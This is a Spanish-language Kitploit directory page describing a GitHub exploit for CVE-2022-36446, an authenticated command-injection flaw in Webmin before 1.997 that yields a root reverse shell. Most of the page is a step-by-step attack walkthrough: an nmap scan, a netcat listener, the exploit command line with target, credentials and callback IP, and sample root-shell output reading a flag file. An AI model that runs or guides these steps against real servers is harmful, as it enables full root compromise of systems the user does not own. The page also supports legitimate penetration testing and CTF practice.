Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-36446-Webmin-RCE — Exploit de ejecución remota de código autenticado para Webmin < 1.997 a través del módulo de Actualizaciones de Paquetes de Software. Inyecta comandos arbitrarios como root a través de un parámetro no saneado, entregando una reverse shell. | Kitploit
Herramientas/GitHubGitHub/darnabin/cve-2022-36446-webmin-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubdarnabin/cve-2022-36446-webmin-rce

CVE-2022-36446-Webmin-RCE

Exploit de ejecución remota de código autenticado para Webmin < 1.997 a través del módulo de Actualizaciones de Paquetes de Software. Inyecta comandos arbitrarios como root a través de un parámetro no saneado, entregando una reverse shell.

Ver Repositorio
2hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-36446 — Webmin < 1.997 RCE (Authenticated)

Exploit para la vulnerabilidad de Remote Code Execution en Webmin versiones anteriores a 1.997, a través del módulo Software Package Updates.

¿Cómo funciona?

El módulo Software Package Updates de Webmin no sanitiza correctamente el parámetro u antes de pasarlo al sistema. Un usuario autenticado con acceso a ese módulo puede inyectar comandos arbitrarios que se ejecutan como root.


Requisitos previos

Instala las dependencias antes de ejecutar el exploit:

root@kitploit:~
pip3 install requests beautifulsoup4 lxml urllib3

Parámetros

ParámetroDescripciónEjemplo
-tURL del target (sin puerto)https://192.168.1.10
-uUsuario de Webminadmin
-pContraseña de Webminpassword123
-lTu IP (donde recibes la shell)192.168.1.5
-lpPuerto donde escuchas4444

Paso a paso

1 — Identifica la IP del target con Nmap:

root@kitploit:~
nmap -sV TARGET_IP
# Busca el puerto 10000 con Webmin

2 — Abre el listener en tu máquina:

root@kitploit:~
nc -lvnp 4444

3 — En otra terminal, ejecuta el exploit:

root@kitploit:~
python3 exploit.py \
  -t https://TARGET_IP \
  -u admin \
  -p PASSWORD \
  -l TU_IP \
  -lp 4444

4 — Si el exploit es exitoso verás:

5 — En el listener recibirás una shell como root:

root@kitploit:~
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}

Ejemplo completo

root@kitploit:~
# Terminal 1
nc -lvnp 4444

# Terminal 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444

Referencia

  • CVE: CVE-2022-36446
  • CVSS Score: 9.9 (Critical)
  • Versión vulnerable: Webmin < 1.997
  • Exploit original: https://www.exploit-db.com/exploits/50998
  • Autor original: Emir Polat
Descargar herramienta